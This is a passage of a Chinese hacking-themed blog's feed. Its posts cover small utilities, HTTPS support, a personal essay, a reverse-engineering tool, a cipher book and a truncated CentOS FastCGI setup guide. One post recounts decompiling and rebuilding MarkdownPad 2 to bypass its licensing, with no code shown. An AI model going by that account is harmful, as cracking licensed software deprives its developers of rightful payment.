tag:blogger.com,1999:blog-37774500461884031472019-10-28T14:34:10.298+08:00☆Obaby's H4cking W0rld☆<p>Hack-Crack==Backdoors - RATs - Trojans // Binders-Packers - Rootkits </p>
<p>破解-黑客-零日漏洞-灰鸽子/上兴/PCShare-木马免杀-网站入侵-信息安全</p>☆obaby☆http://www.blogger.com/profile/12833247715358659703noreply@blogger.comBlogger401125tag:blogger.com,1999:blog-3777450046188403147.post-91130425724062751902013-05-09T20:07:00.001+08:002013-05-09T20:07:01.894+08:00快播Qvod !mv 文件合并器 (代码)<p><a href='http://www.h4ck.org.cn/wp-content/uploads//2013/05/video.png'><img height='428' width='695' src='http://www.h4ck.org.cn/wp-content/uploads//2013/05/video.png' alt='video' class='alignnone wp-image-5146'/></a></p><br/><p>测试的合并文件为1.5G,150个文件,影片时长3小时,如果出现不兼容的情况请自行修改代码!</p><br/><p><span style='font-size: large;'>使用方法</span><br/><br/>选择要合并文件的第一个文件,程序会自动会自动填写目标文件名。选择完之后点“开始合体”就行鸟。 就这么简单 <img class='wp-smiley' alt=';-)' src='http://www.h4ck.org.cn/wp-content/plugins/smilies-themer/kopete/wink.png'/></p><br/> <br/><p>为什么要做这个东西:</p><br/><blockquote><p>如果用过手机上的快播(Android)会发现看完的影片最终会是一些!mv文件,如果要在电脑上看就会变得灰常蛋疼 当然如果只是看一次,那么至于最终会成为什么样子就不关键了。关键的是还想再看第二次的。</p><br/><p>这个东西就是用来在电脑上合并文件的,当然可以用xcopy命令。如果不喜欢那个东西就可以用这个小软件了,灰常简单。</p></blockquote><br/><p>截图:</p><br/><p><a href='http://www.h4ck.org.cn/wp-content/uploads//2013/05/screen.png'><img height='217' width='398' src='http://www.h4ck.org.cn/wp-content/uploads//2013/05/screen.png' alt='screen' class='alignnone size-full wp-image-5145'/></a></p><br/><p>代码地址:<a target='_blank' href='http://code.h4ck.org.cn/qvod-mv-file-merger'>http://code.h4ck.org.cn/qvod-mv-file-merger</a></p><br/><p>如果不需要源代码可以单独下载那个exe就行了。</p><br/><br/><div style='font-size:0px;height:0px;line-height:0px;margin:0;padding:0;clear:both;'/> <br/><a href='http://www.h4ck.org.cn/2013/05/%e5%bf%ab%e6%92%adqvod-mv-%e6%96%87%e4%bb%b6%e5%90%88%e5%b9%b6%e5%99%a8-%ef%bc%88%e4%bb%a3%e7%a0%81%ef%bc%89/'>快播Qvod !mv 文件合并器 (代码)</a>☆obaby☆http://www.blogger.com/profile/12833247715358659703noreply@blogger.com8tag:blogger.com,1999:blog-3777450046188403147.post-12467407351175055672013-05-07T20:51:00.001+08:002013-05-07T20:51:42.435+08:00Opera BackUp Source Code<p><a href='http://www.h4ck.org.cn/wp-content/uploads//2013/05/code.png'><img height='532' width='794' src='http://www.h4ck.org.cn/wp-content/uploads//2013/05/code.png' alt='code' class='alignnone wp-image-5142'/></a></p><br/><p>Link: <a target='_blank' href='http://code.h4ck.org.cn/opera-backup/'>http://code.h4ck.org.cn/opera-backup/</a></p><br/><p>Opera BackUp</p><br/><p>适用于不喜欢使用Opera link的情况下,将数据以文件夹的形式进行备份 还原</p><br/><br/><div style='font-size:0px;height:0px;line-height:0px;margin:0;padding:0;clear:both;'/> <br/><a href='http://www.h4ck.org.cn/2013/05/opera-backup-source-code/'>Opera BackUp Source Code</a>☆obaby☆http://www.blogger.com/profile/12833247715358659703noreply@blogger.com6tag:blogger.com,1999:blog-3777450046188403147.post-88646178711008122522013-05-06T22:54:00.001+08:002013-05-06T22:54:18.340+08:00Blog 现已支持Https访问<p><a href='http://www.h4ck.org.cn/wp-content/uploads//2013/05/https.png'><img height='499' width='527' src='http://www.h4ck.org.cn/wp-content/uploads//2013/05/https.png' alt='https' class='alignnone size-full wp-image-5136'/></a></p><br/><p>现在支持https访问,可以通过<a href='https://www.h4ck.org.cn'>https://www.h4ck.org.cn</a> ,或者 <a href='https://www.h4ck.ws'>https://www.h4ck.ws</a> 来访问,同样支持泛解析,那个www不是必需的。由于证书是非权威机构办法的,请信任我的证书,嘻嘻。要不你是访问不了滴。嗯嗯。其实就是说这个东西。然后就没有然后了。</p><br/><br/><div style='font-size:0px;height:0px;line-height:0px;margin:0;padding:0;clear:both;'/> <br/><a href='http://www.h4ck.ws/2013/05/blog-%e7%8e%b0%e5%b7%b2%e6%94%af%e6%8c%81https%e8%ae%bf%e9%97%ae/'>Blog 现已支持Https访问</a>☆obaby☆http://www.blogger.com/profile/12833247715358659703noreply@blogger.com5tag:blogger.com,1999:blog-3777450046188403147.post-70125110915139969712013-05-06T22:46:00.001+08:002013-05-06T22:46:43.892+08:00微光城市<p>融入一个城市本来就不是一件容易的事情,当开始慢慢的习惯这个城市的节奏的时候却发现更多的事情已经来临,面临着更多的选择。小白说过,对于一个城市有没有感情,值不值得留恋不在于这个城市是什么样子,而在于这个城市里面到底有没有值得自己留恋的人。</p><br/><p>拒绝一个人,很容易,但是想要在重开敞开心扉来爱一个人的时候却发现异常的困难。困难之处在于不知道该怎么开始,也不知道该怎么去呵护一段所谓的感情。当夜幕降临的时候,万家灯火,从远处望过去星星点点。从山顶看下去是点点的温馨和爱意。也许事实并非如此,但是大多数的时候表象蒙蔽了现实。</p><br/><p>离开农村到现在已经有十四年了,小城市大城市都去过。但是却从来没有一个城市让自己有归属感。对于那个城市来说自己都是匆匆忙忙的一个过客,甚至离开了一个城市都不曾留下片刻的记忆。离开一个城市也不会有太多的人记得自己曾经在这个城市生活过,也没有给这个城市留下任何的烙印。如果要给一个城市打上自己的烙印,现在看来自己还做不到。但是我相信自己有一天会。</p><br/><p>大大小小的城市之间不断的奔波着。乘坐者各种交通工具,穿梭在各种空间里。有的时候想如果就这么一直走下去从来都不会有尽头,该多好。但是每次的旅途总是有最后的终点。不管是一个人还是两个人,还是一群人,多少人一起出发都不关键,只是到了最后的时候自己总是一个人,彳亍独行,独自奔向最终的目标。华灯初上,灯红酒绿的生活自己还是适应不了,也没有办法完全的融入一个城市的氛围之中。说的更直白一点是自己还没有融入这个城市的能力,所有的一切都不属于自己。看得到的,看不到的都不属于自己,离开的时候甚至都不会留在任何人的记忆中这才是最大的遗失。</p><br/><p>不管穿梭过多少城市,但是却没有几个城市自己真正的停留过。不喜欢大城市的那种生活,甚至不喜欢小城市的那种生活。想着有一天自己能到一个偏僻的地方,有自己的一片天地。依山傍水,绿水隐隐,但是还是做着自己喜欢的事情,比如IT。远离城市的喧嚣,做自己喜欢的东西,也不必在乎这个事情之外是如何的发展。一个高科技的桃花源,这才是我想要的生活。</p><br/><p>每到一个新的地方会认识新的一群人,但是最终能够保持联系的却也就只有那么一两个。大多数的人只是在工作的时候有联系。这也就是所谓的同事和朋友的区别。不是左右的同事都能成为朋友。在一个地方当离开的时候能交到一两个朋友就已经是幸事了。同样所谓的同学也不是朋友,到现在已经有很多的同学失去了联系。有的是自己主动遗弃的,有的是不知道该说些什么。多年以前的事情都随着距离的不断拉大,让联系也变得越来越脆弱。虽然从一个城市到另外一个城市变得越来越方便,但是却鲜有人为了见一个人从一个城市跑到另外一个城市。当这跟关系越来越脆弱的时候,时间就会在不经意间将这最后的一点重量加在距离上,于是也就彻底了断绝了联系。</p><br/><p>沟通的手段越来越多,但是沟通的效率却越来越低。虽然网上的沟通必不可少,但是我还是喜欢那种面对面的沟通。这种靠文字和声音传递来的信息,有的时候充满了欺骗。因为看不到,也就不知道当时是什么样的表情。有的时候甚至分不清事情的真假。认识的人从这个世界上消失了是一件很令人伤心的事情,不管是认识的还是不认识的,不管是有缘的还是无缘的。当听到曾经给我介绍的女生因为脑溢血去世的时候内心还是咯噔一下,生活总是充满了意外。这个女生因为我没有确定最终的归属地是潍坊还是哪里,而终究无缘继续了解,更没有机会见上一面。但是一个陌生人出现在自己的生命力,却以一种悲剧的形式消失的时候内心还是颇为难过。不单是因为消逝,而是因为无助。一个个的城市在冥冥中也就注定了一个人未来会认识的人和可能的结果,虽然自己不相信宿命,但是当离开一个城市,进入到另外一个城市的时候却不可避免的陷入这种境遇,进入一个城市也就意味着一场新的生活开始了。即使在一个城市呆的时间再久认识的也只是有限的那么几个人。并且在认识一个人的时候充满了巧合,充满了惊喜,同样也充满了意外。如果两个陌生人即使只需要六个陌生人就能联系到一起,但是现实中却永远也凑不齐这六个人。更多的时候认识一个人,再和另外一个人提起的时候,另外的一个人可能早就知道此人。这才是两个人的距离。</p><br/><p>快乐的时光总是过得太快,时钟上的分针似乎已经不是分针,俨然成了秒针。就像在计时的时候复位键按下的一刹那,秒针瞬间转会到起点。快乐的时间就是这种感觉,想拼命的拉长时间却无能为力。坐在山大小树林的的长椅上看着小树林内的一切,和垂垂欲坠的夕阳内心虽然快乐,开心,但是同时也担心太阳就那么坠落下去。即使看着钟表的秒针一个格的跳过去,最终夕阳还是坠落地平线。而到了晚上,对于城市来说似乎没什么区别,倒是还是有那么多的人,只是当时间更晚之后才知道一天是真的结束了。而一不小心,却已经迎来了第二天的开始,看着指针划过12,也就意味着新的一天开始了。回家的时候晚上总是很快就成了漆黑一片,没有路灯,也没有那么斑驳的夜生活,于是九点多也就基本进入了梦乡,早上太阳初升,六七点钟已经醒来,看着冉冉上升的太阳是另外的一种感觉。</p><br/><p>但是这种黑暗也曾给自己带来了无穷的恐惧,晚上九点多骑单车疾驰在那种黑漆漆的乡村小道上,没有月光的时候变得更加黑暗。之所以疾驰,是因为内心的恐惧,不知道后面会出现什么东西,于是只是骑的更快一些,更快一些。当看到前面星星的灯火,似乎就看到了太阳,快速的追上去,追上那种希望。到了城市之后再也没有那种伸手不见五指的夜,也就没有看到那种星火的欣喜。城市带来了一些,同时也带走了一些。</p><br/><br/><div style='font-size:0px;height:0px;line-height:0px;margin:0;padding:0;clear:both;'/> <br/><a href='http://www.h4ck.org.cn/2013/05/%e5%be%ae%e5%85%89%e5%9f%8e%e5%b8%82/'>微光城市</a>☆obaby☆http://www.blogger.com/profile/12833247715358659703noreply@blogger.com3tag:blogger.com,1999:blog-3777450046188403147.post-62245728128035596892013-04-27T22:18:00.001+08:002013-04-27T22:18:37.686+08:00MarkdownPad 2 以及其他<p><a href='http://www.h4ck.org.cn/wp-content/uploads//2013/04/Markdown.png'><img height='507' width='675' src='http://www.h4ck.org.cn/wp-content/uploads//2013/04/Markdown.png' alt='Markdown' class='alignnone wp-image-5125'/></a></p><br/><p>文章的主题不在于怎么处理这个东西,也不在于怎么破解这个软件。只是想说一些相关的东西,软件的加密算法用的是RSA2048,并且加密模块用的是openssl。其实个人不是很喜欢分析C#的东西,因为通常软件都会做强签名或者混淆,分析起来非常的蛋疼。<br/><br/><br/>而之所以对这款软件这么感兴趣是因为前一段时间在折腾开源代码的时候开始接触到markdown这个语言。yaocoder曾经提供过一个网址支持md文件的在线编辑,但是我个人对于在线编辑没什么兴趣,并且大多数的时候md文件写好了也就直接扔到bitbucket了,所以也不需要在线保存。刚拿到这个东西的时候粗略的看了一下,免费版不能保存pdf,并且有的选项是不能设置的。刚开始的时候用ildasm进行处理,但是由于需要处理的代码太多,修改了几次效果一般,就不想去折腾了。昨天看到.NET Reflector 更新了8.0,重新到处了一下发现代码进步确实不少,至少那些明显的错误都没了。并且对于其余的错误处理起来倒是也不是十分复杂。</p><br/><p><a href='http://www.h4ck.org.cn/wp-content/uploads//2013/04/project.png'><img height='568' width='743' src='http://www.h4ck.org.cn/wp-content/uploads//2013/04/project.png' alt='project' class='alignnone wp-image-5126'/></a></p><br/><p>再次之前也没有刻意的去学习那些C#的东西,但是靠着Google和对其他语言的一些了解还是把错误全部都排除掉了。VS2012还是蛮好的,但是不管什么样的东西总会有人不断的蹦出来说坏话,当然这个也确实没什么办法避免,众口难调。其实VS我用过的版本还是蛮多的,6,2008,2010,2012.现在主要是10和12了,偶尔会用到6,但是08基本不用了,对于以前的一些项目转化到12也没有什么太大的问题。当然.net的执行效率一向是个比较蛋疼的问题,但是在固态硬盘上执行效率也可以忍受,其实对于工具类的东西我还是喜欢向前看齐。没有必要守着那个老古董,如果机器跑的动的话。</p><br/><p>在处理这个东西的时候得到了大侠的不少的指点,也少走了不少的弯路,表示感谢。</p><br/><p>前一段时间看了下iOS的开发,更早的时候看下Android的开发。不管什么语言来开发,很多的东西都是相通的。也没有太多的秘密,如果不想挖的非常深的话。</p><br/><p>最后想说的是,如果.net的东西没有任何的保护,那么软件发布了也就意味着源代码一块发布了。虽然没有这个软件的私钥,没有办法作出keygen来,但是对于单纯的破解已经是绰绰有余了,甚至可以在此基础在进行再次的开发了。也许老外一向比较实在吧,只是这样把源代码送出来还是比较少见的。</p><br/><p><a href='http://www.h4ck.org.cn/wp-content/uploads//2013/04/view.png'><img height='536' width='720' src='http://www.h4ck.org.cn/wp-content/uploads//2013/04/view.png' alt='view' class='alignnone wp-image-5127'/></a></p><br/><p>win8 其实也没那么烂,东西本来就是这样,喜欢就用,不喜欢就不用。没有必要和疯狗一样咬来咬去的。</p><br/><p><a href='http://www.h4ck.org.cn/wp-content/uploads//2013/04/about1.png'><img height='318' width='504' src='http://www.h4ck.org.cn/wp-content/uploads//2013/04/about1.png' alt='about' class='alignnone size-full wp-image-5128'/></a></p><br/><p>重新构建效果。<span style='font-size: medium; color: #00ffff;'><strong>(请支持正版!)</strong></span></p><br/><p>资料:</p><br/><p>MarkDown :<a target='_blank' href='http://zh.wikipedia.org/zh-hans/Markdown'>http://zh.wikipedia.org/zh-hans/Markdown</a></p><br/><p>MarkdownPad2 :<a target='_blank' href='http://markdownpad.com/'>http://markdownpad.com/</a></p><br/><br/><div style='font-size:0px;height:0px;line-height:0px;margin:0;padding:0;clear:both;'/> <br/><a href='http://www.h4ck.ws/2013/04/markdownpad-2-%e4%bb%a5%e5%8f%8a%e5%85%b6%e4%bb%96/'>MarkdownPad 2 以及其他</a>☆obaby☆http://www.blogger.com/profile/12833247715358659703noreply@blogger.com1tag:blogger.com,1999:blog-3777450046188403147.post-7900381632682391272013-04-24T18:29:00.001+08:002013-04-24T18:29:33.510+08:00Symbol Type Viewer 1.0.0.6<p><a href='http://www.h4ck.org.cn/wp-content/uploads//2013/04/20130424182236.jpg'><img height='439' width='623' src='http://www.h4ck.org.cn/wp-content/uploads//2013/04/20130424182236.jpg' alt='20130424182236' class='alignnone wp-image-5121'/></a></p><br/><p>Symbol Type Viewer is a tool which makes it possible to easily visualize the types which can be defined in the symbols of the modules of the systems Microsoft Windows 32/64bit. Moreover, it makes it possible to convert these informations for the C language (.h) and the disassembler IDA of DataRescue (.idc).</p><br/><p><br/><br/>Public informations in connection with the types defined in the symbols are extremely limited. And the development of this tool could not have been done without the excellent work of Oleg Starodumov. (http://www.debuginfo.com/)</p><br/><p>Symbol Type Viewer was developed with C# for the easy installation of graphical interface. But its principal engine works with native API of helpdbg.dll.</p><br/><p>Symbol Type Viewer recognizes the types Structure, Union, Enum, Function like all the basic types (table, pointer, base_type, etc…).</p><br/><p>The modules of Windows containing class types are extremely rare. It was thus impossible to do a reliable work with class types. Symbol Type Viewer thus does not manage the modules containing class informations.</p><br/><p>This tool is made for all curious ones and reverse engineering fanatics.</p><br/><p>To summarize, Symbol Type Viewer allows to :<br/><br/>download the symbols (pdb) very simply.<br/><br/>sail and visualize in a detailed way the types and their members in the form of tree structure<br/><br/>easily find the unused areas in the structures (padding). These areas are theoretically usable to put personal data there<br/><br/>translate the structures for the C Language (.h) and for IDA script (.idc) of DataRescue (http://www.datarescue.com/idabase/)<br/><br/>personalize the formatting: addition of suffix in the names of types, freeze the sizes of structures and members (the pointers become ULONG32 for a 32bit system and UINT64 for a 64bit system)<br/><br/>apply searchs of texts or regular expressions<br/><br/>do a batch processing by treating all modules met in a directory and its under-directories. For example: C:\Windows;)</p><br/><p>At this time, Symbol Type Viewer is distributed in version beta and with license GPL (http://www.gnu.org/licenses/gpl.html).<br/><br/>The sources will be placed at the disposal at the final version… after a good cleaning <img class='wp-smiley' alt=';)' src='http://h4ck.ws/wp-content/plugins/smilies-themer/kopete/wink.png'/></p><br/><p>Symbol Type Viewer functions with Microsoft .NET Framework 2.0.</p><br/><p>Download link:<a target='_blank' href='http://woodmann.com/collaborative/tools/index.php/Symbol_Type_Viewer'>http://woodmann.com/collaborative/tools/index.php/Symbol_Type_Viewer</a></p><br/><br/><div style='font-size:0px;height:0px;line-height:0px;margin:0;padding:0;clear:both;'/> <br/><a href='http://h4ck.ws/2013/04/symbol-type-viewer-0-06/'>Symbol Type Viewer 1.0.0.6</a>☆obaby☆http://www.blogger.com/profile/12833247715358659703noreply@blogger.com0tag:blogger.com,1999:blog-3777450046188403147.post-67516037225899927692013-04-22T11:53:00.001+08:002013-04-22T11:53:49.917+08:00Hacking Secret Ciphers with Python<p><a href='http://www.h4ck.org.cn/wp-content/uploads//2013/04/codebreakercover.png'><img height='491' width='365' src='http://www.h4ck.org.cn/wp-content/uploads//2013/04/codebreakercover.png' alt='codebreakercover' class='alignnone size-full wp-image-5118'/></a></p><br/><div id='main'><br/><div id='center'><br/><div><br/><div><br/><div>Al Sweigart的第三本著作《Hacking Secret Ciphers with Python》正式<a href='http://inventwithpython.com/blog/2013/04/15/hacking-secret-ciphers-with-python-released/'><span style='text-decoration: underline;'>发布</span></a>,作者在创作共用-署名-非商业使用-相同方式共享许可证下免费发布了该书的电子版(<a href='http://inventwithpython.com/HackingSecretCiphersWithPython.pdf'><span style='text-decoration: underline;'>PDF</span></a>和<a href='http://inventwithpython.com/hacking/chapters'><span style='text-decoration: underline;'>HTML</span></a>格式),<a href='http://www.amazon.com/gp/product/1482614375/ref=as_li_qf_sp_asin_tl?ie=UTF8&camp=1789&creative=9325&creativeASIN=1482614375&linkCode=as2&tag=playwithpyth-20'><span style='text-decoration: underline;'>实体版</span></a>售价25美元,销售所得将全部捐给EFF、创作共用和Tor项目。本书面向的是无编程或加密学经验的读者,介绍用Python编程语言实现和破解多种密码技术,作者从几千年前的凯撒密码一直讲到现代的公钥加密。本书特别献给了今年1月去世的Aaron Swartz。</div><br/></div><br/></div><br/></div><br/></div><br/><br/><div style='font-size:0px;height:0px;line-height:0px;margin:0;padding:0;clear:both;'/> <br/><a href='http://vjoyer.com/2013/04/hacking-secret-ciphers-with-python/'>Hacking Secret Ciphers with Python</a>☆obaby☆http://www.blogger.com/profile/12833247715358659703noreply@blogger.com1tag:blogger.com,1999:blog-3777450046188403147.post-52586153012601552122013-04-18T14:00:00.001+08:002013-04-18T14:00:36.218+08:00CentOS Apache 2 FastCGI<p><a href='http://www.h4ck.org.cn/wp-content/uploads//2013/04/fastcgi.jpg'><img height='490' width='683' src='http://www.h4ck.org.cn/wp-content/uploads//2013/04/fastcgi.jpg' alt='fastcgi' class='alignnone wp-image-5115'/></a></p><br/><p>这几天vps又开始频繁抽风,于是给反馈了一下。然后得到的答复是可能资源耗尽了,让自己监视下。得到这个答复其实不用监视也知道是apache服务耗尽了系统内存,然后就所有的服务都失去响应了。<br/><br/><br/>但是还是不想全部折腾到ngix上去,于是就想看下有没有其他的解决方案,幸运的是发现了fastcgi这个东西。换了之后系统内存立即就下来了。效果非常不错的,但是还要多跑几天看看。</p><br/><p>安装方式:</p><br/><p>FastCGI is a protocol for interfacing interactive programs with a web server. FastCGI’s main aim is to reduce the overhead associated with interfacing the web server and CGI programs, allowing a server to handle more web page requests at once.</p><br/><p>Also, PHP is not recommended with multithreaded Apache2 (worker MPM) because of performance and some 3rd party PHP extensions are not not guaranteed thread-safe.</p><br/><p>nginx and lighttpd has inbuilt support for FastCGI. For Apache web server you need to use either mod_fastcgi or mod_fcgid.<br/><br/>Why use mod_fastcgi instead of mod_perl / mod_php?</p><br/><p>From the wikipedia article:</p><br/><blockquote><p>Instead of creating a new process for every request, FastCGI can use a single persistent process which handles many requests over its lifetime. Processing of multiple requests simultaneously is achieved either by using a single connection with internal multiplexing (ie. multiple requests over a single connection) and/or by using multiple connections. Many such processes can exist, something that can increase stability and scalability. FastCGI also allows programs to get the web server to do certain simple operations, like reading in a file, before the request is handed over. Environment information and page requests are sent from the web server to the process over a TCP connection (for remote processes) or Unix domain sockets (for local processes). Responses are returned from the process to the web server over the same connection. The connection may be closed at the end of a response, but the web server and the process are left standing.<br/><br/>Many web site administrators and programmers are finding that the separation of web applications from the web server in FastCGI (and the simpler SCGI) has many desirable advantages over embedded interpreters (mod_perl, mod_php, etc.). This separation allows server and application processes to be restarted independently — an important consideration for busy web sites. It also facilitates per-application security policies — important for ISPs and web hosting companies.</p></blockquote><br/><p>In this quick tutorial, you will learn about Apache 2 + mod_fastcgi + PHP installation and configuration under Red Hat Enterprise Linux / CentOS Linux version 5.x+.<br/><br/>Install mod_fastcgi</p><br/><p>Make sure required packages are installed (httpd-devel and apr-devel required to compile mod_fastcgi), enter:</p><br/><br/><div class='wp_syntax'><table><tr><td class='line_numbers'><pre>1<br/></pre></td><td class='code'><pre style='font-family:monospace;' class='bash'><span style='color: #666666;'># </span><span style='color: #c20cb9; font-weight: bold;'>yum install</span> libtool httpd-devel apr-devel apr</pre></td></tr></table></div><br/><br/><p>Next, grab the latest mod_fastcgi source code, enter:</p><br/><br/><div class='wp_syntax'><table><tr><td class='line_numbers'><pre>1<br/>2<br/></pre></td><td class='code'><pre style='font-family:monospace;' class='bash'><span style='color: #666666; font-style: italic;'># cd /opt</span><br/><span style='color: #666666; font-style: italic;'># wget http://www.fastcgi.com/dist/mod_fastcgi-current.tar.gz</span></pre></td></tr></table></div><br/><br/><p>Untar tar ball, type:</p><br/><br/><div class='wp_syntax'><table><tr><td class='line_numbers'><pre>1<br/>2<br/></pre></td><td class='code'><pre style='font-family:monospace;' class='bash'><span style='color: #666666; font-style: italic;'># tar -zxvf mod_fastcgi-current.tar.gz</span><br/><span style='color: #666666; font-style: italic;'># cd mod_fastcgi-2.4.6/</span></pre></td></tr></table></div><br/><br/><p>Make a copy of Makefile.AP2, enter:</p><br/><br/><div class='wp_syntax'><table><tr><td class='line_numbers'><pre>1<br/></pre></td><td class='code'><pre style='font-family:monospace;' class='bash'><span style='color: #666666;'># </span><span style='color: #c20cb9; font-weight: bold;'>cp</span> Makefile.AP2 Makefile</pre></td></tr></table></div><br/><br/><p>Compile and install mod_fastcgi for 32 bit system, enter:</p><br/><br/><div class='wp_syntax'><table><tr><td class='line_numbers'><pre>1<br/>2<br/></pre></td><td class='code'><pre style='font-family:monospace;' class='bash'><span style='color: #666666; font-style: italic;'># make top_dir=/usr/lib/httpd</span><br/><span style='color: #666666; font-style: italic;'># make install top_dir=/usr/lib/httpd</span></pre></td></tr></table></div><br/><br/><p>Compile and install mod_fastcgi for 64 bit system, enter:</p><br/><br/><div class='wp_syntax'><table><tr><td class='line_numbers'><pre>1<br/>2<br/></pre></td><td class='code'><pre style='font-family:monospace;' class='bash'><span style='color: #666666; font-style: italic;'># make top_dir=/usr/lib64/httpd</span><br/><span style='color: #666666; font-style: italic;'># make install top_dir=/usr/lib64/httpd</span></pre></td></tr></table></div><br/><br/><p>Sample output:</p><br/><br/><div class='wp_syntax'><table><tr><td class='line_numbers'><pre>1<br/>2<br/>3<br/>4<br/></pre></td><td class='code'><pre style='font-family:monospace;' class='bash'><span style='color: #c20cb9; font-weight: bold;'>make</span> <span style='color: #c20cb9; font-weight: bold;'>install</span> <span style='color: #007800;'>top_dir</span>=<span style='color: #000000; font-weight: bold;'>/</span>usr<span style='color: #000000; font-weight: bold;'>/</span>lib64<span style='color: #000000; font-weight: bold;'>/</span>httpd<br/><span style='color: #c20cb9; font-weight: bold;'>make</span><span style='color: #7a0874; font-weight: bold;'>[</span><span style='color: #000000;'>1</span><span style='color: #7a0874; font-weight: bold;'>]</span>: Entering directory <span style='color: #000000; font-weight: bold;'>`/</span>tmp<span style='color: #000000; font-weight: bold;'>/</span>mod_fastcgi-2.4.6<span style='color: #ff0000;'>'<br/>/usr/lib64/apr-1/build/libtool --silent --mode=install cp mod_fastcgi.la /usr/lib64/httpd/modules/<br/>make[1]: Leaving directory `/tmp/mod_fastcgi-2.4.6'</span></pre></td></tr></table></div><br/><br/><p>Configure mod_fastcgi</p><br/><p>Open /etc/httpd/conf.d/mod_fastcgi.conf file</p><br/><br/><div class='wp_syntax'><table><tr><td class='line_numbers'><pre>1<br/></pre></td><td class='code'><pre style='font-family:monospace;' class='bash'><span style='color: #666666;'># </span><span style='color: #c20cb9; font-weight: bold;'>vi</span> <span style='color: #000000; font-weight: bold;'>/</span>etc<span style='color: #000000; font-weight: bold;'>/</span>httpd<span style='color: #000000; font-weight: bold;'>/</span>conf.d<span style='color: #000000; font-weight: bold;'>/</span>mod_fastcgi.conf</pre></td></tr></table></div><br/><br/><p>Add an entry to it like this:</p><br/><br/><div class='wp_syntax'><table><tr><td class='line_numbers'><pre>1<br/></pre></td><td class='code'><pre style='font-family:monospace;' class='bash'>LoadModule fastcgi_module modules<span style='color: #000000; font-weight: bold;'>/</span>mod_fastcgi.so</pre></td></tr></table></div><br/><br/><p>Save and close the file. Restart httpd, enter:</p><br/><br/><div class='wp_syntax'><table><tr><td class='line_numbers'><pre>1<br/></pre></td><td class='code'><pre style='font-family:monospace;' class='bash'><span style='color: #666666;'># </span>service httpd restart</pre></td></tr></table></div><br/><br/><p>Sample output:</p><br/><br/><div class='wp_syntax'><table><tr><td class='line_numbers'><pre>1<br/>2<br/>3<br/>4<br/>5<br/>6<br/></pre></td><td class='code'><pre style='font-family:monospace;' class='bash'><span style='color: #7a0874; font-weight: bold;'>[</span>Mon Dec <span style='color: #000000;'>29</span> <span style='color: #000000;'>23</span>:<span style='color: #000000;'>24</span>:<span style='color: #000000;'>44</span> <span style='color: #000000;'>2008</span><span style='color: #7a0874; font-weight: bold;'>]</span> <span style='color: #7a0874; font-weight: bold;'>[</span>notice<span style='color: #7a0874; font-weight: bold;'>]</span> caught SIGTERM, shutting down<br/><span style='color: #7a0874; font-weight: bold;'>[</span>Mon Dec <span style='color: #000000;'>29</span> <span style='color: #000000;'>23</span>:<span style='color: #000000;'>24</span>:<span style='color: #000000;'>44</span> <span style='color: #000000;'>2008</span><span style='color: #7a0874; font-weight: bold;'>]</span> <span style='color: #7a0874; font-weight: bold;'>[</span>notice<span style='color: #7a0874; font-weight: bold;'>]</span> suEXEC mechanism enabled <span style='color: #7a0874; font-weight: bold;'>(</span>wrapper: <span style='color: #000000; font-weight: bold;'>/</span>usr<span style='color: #000000; font-weight: bold;'>/</span>sbin<span style='color: #000000; font-weight: bold;'>/</span>suexec<span style='color: #7a0874; font-weight: bold;'>)</span><br/><span style='color: #7a0874; font-weight: bold;'>[</span>Mon Dec <span style='color: #000000;'>29</span> <span style='color: #000000;'>23</span>:<span style='color: #000000;'>24</span>:<span style='color: #000000;'>44</span> <span style='color: #000000;'>2008</span><span style='color: #7a0874; font-weight: bold;'>]</span> <span style='color: #7a0874; font-weight: bold;'>[</span>notice<span style='color: #7a0874; font-weight: bold;'>]</span> Digest: generating secret <span style='color: #000000; font-weight: bold;'>for</span> digest authentication ...<br/><span style='color: #7a0874; font-weight: bold;'>[</span>Mon Dec <span style='color: #000000;'>29</span> <span style='color: #000000;'>23</span>:<span style='color: #000000;'>24</span>:<span style='color: #000000;'>44</span> <span style='color: #000000;'>2008</span><span style='color: #7a0874; font-weight: bold;'>]</span> <span style='color: #7a0874; font-weight: bold;'>[</span>notice<span style='color: #7a0874; font-weight: bold;'>]</span> Digest: <span style='color: #000000; font-weight: bold;'>done</span><br/><span style='color: #7a0874; font-weight: bold;'>[</span>Mon Dec <span style='color: #000000;'>29</span> <span style='color: #000000;'>23</span>:<span style='color: #000000;'>24</span>:<span style='color: #000000;'>44</span> <span style='color: #000000;'>2008</span><span style='color: #7a0874; font-weight: bold;'>]</span> <span style='color: #7a0874; font-weight: bold;'>[</span>notice<span style='color: #7a0874; font-weight: bold;'>]</span> FastCGI: process manager initialized <span style='color: #7a0874; font-weight: bold;'>(</span>pid <span style='color: #000000;'>4785</span><span style='color: #7a0874; font-weight: bold;'>)</span><br/><span style='color: #7a0874; font-weight: bold;'>[</span>Mon Dec <span style='color: #000000;'>29</span> <span style='color: #000000;'>23</span>:<span style='color: #000000;'>24</span>:<span style='color: #000000;'>44</span> <span style='color: #000000;'>2008</span><span style='color: #7a0874; font-weight: bold;'>]</span> <span style='color: #7a0874; font-weight: bold;'>[</span>notice<span style='color: #7a0874; font-weight: bold;'>]</span> Apache<span style='color: #000000; font-weight: bold;'>/</span>2.2.3 <span style='color: #7a0874; font-weight: bold;'>(</span>CentOS<span style='color: #7a0874; font-weight: bold;'>)</span> configured <span style='color: #660033;'>--</span> resuming normal operations</pre></td></tr></table></div><br/><br/><p>How do I configure PHP as FastCGI process under RHEL / CentOS Linux?</p><br/><p>First, you need to disable mod_php5, enter:</p><br/><br/><div class='wp_syntax'><table><tr><td class='line_numbers'><pre>1<br/></pre></td><td class='code'><pre style='font-family:monospace;' class='bash'><span style='color: #666666;'># </span><span style='color: #c20cb9; font-weight: bold;'>mv</span> <span style='color: #000000; font-weight: bold;'>/</span>etc<span style='color: #000000; font-weight: bold;'>/</span>httpd<span style='color: #000000; font-weight: bold;'>/</span>conf.d<span style='color: #000000; font-weight: bold;'>/</span>php.conf <span style='color: #000000; font-weight: bold;'>/</span>etc<span style='color: #000000; font-weight: bold;'>/</span>httpd<span style='color: #000000; font-weight: bold;'>/</span>conf.d<span style='color: #000000; font-weight: bold;'>/</span>php.conf.disable</pre></td></tr></table></div><br/><br/><p>Create a shell script in cgi-bin directory called php.fcgi</p><br/><p>Create a script as follows in /var/www/cgi-bin/php.fcgi (or put in your virtual domain cgi-bin directory)</p><br/><br/><div class='wp_syntax'><table><tr><td class='line_numbers'><pre>1<br/>2<br/>3<br/>4<br/>5<br/>6<br/>7<br/>8<br/>9<br/>10<br/>11<br/></pre></td><td class='code'><pre style='font-family:monospace;' class='bash'><span style='color: #666666; font-style: 